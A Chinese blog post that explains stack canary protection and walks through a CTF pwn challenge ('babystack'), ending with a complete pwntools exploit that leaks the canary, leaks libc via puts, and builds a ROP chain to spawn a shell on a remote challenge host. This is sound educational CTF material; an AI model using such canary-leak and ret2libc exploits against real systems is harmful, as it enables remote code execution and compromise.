Canary保护

之前做题没做过canary类型,今天补知识盲点遇到canary,恰好也写一篇吧。

学pwn时基本会遇到几种保护类型,如RELRO,PIE,NX,还有Canary,这里解释一下canary。

栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。

一大段子很烦,看图:32位情况下栈图,左边是正常的,右边是开了canary保护的情况。

进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。

来道例题看看如何破解,常见一种方法就是puts出canary,我们得到他之后在原来的栈溢出上再加个canary就可以绕过了。

看一下攻防世界进阶区的pwn1。

打开checksec,开的很全,除了pie开全乎了。

打开ida

逻辑很简单,自己打开读一下就行了。

主要看一下真实的canary长啥样 。

这是main函数

 

f5下显示是
v6 = __readfsqword(0x28u);
汇编下
 mov     rax, fs:28h
 mov     [rbp+var_8], rax

再看一下main结束时发生什么

 

 看一下jz判断哪里,如果不相等就挑一个 stack check fail的函数

这下算是彻底清晰了

fs:xx中。FS寄存器指向当前活动线程的TEB结构(线程结构)

理论上来说,对于我们就是随机的,所以我们像绕过去栈溢出,一般是老老实实把canary得到。

canary还有一个特点,第一个字符为’\x00’,目的就是为了截断防止泄露出来canary。我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。该题利用的就是这一思路。

得到canary后的操作还是ret2libc的常规操作

exp如下:

from pwn import *
from LibcSearcher import *
p = remote('111.200.241.244',59735)
elf = ELF("./babystack")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x0000000000400908
pop_rdi = 0x0000000000400a93

p.sendlineafter('>> ','1')
payload = b'a' * (0x90 - 8) 
p.sendline(payload)  # 等价于p.send('a' * 0x88 + '\n')
p.sendlineafter('>> ','2')
p.recvuntil('aaaa\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
payload1 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('>> ',b'1')
p.send(payload1)
p.sendlineafter('>> ',b'3')
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.success("puts_addr +: " + hex(puts_addr)
)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
p.sendlineafter('>> ','1')
payload2 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system)
p.send(payload2)
p.sendlineafter('>> ','3')
p.interactive()

其中注释那个等价我再带一嘴,read函数在读取时类似gets,会把空格也算入,除此以外还会把最后的换行符算入,也就是\n。(小声嘀咕:(第一次分清换行符和回车符,那个u64是咋算开头的空字符的,知识盲区了属于是)

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值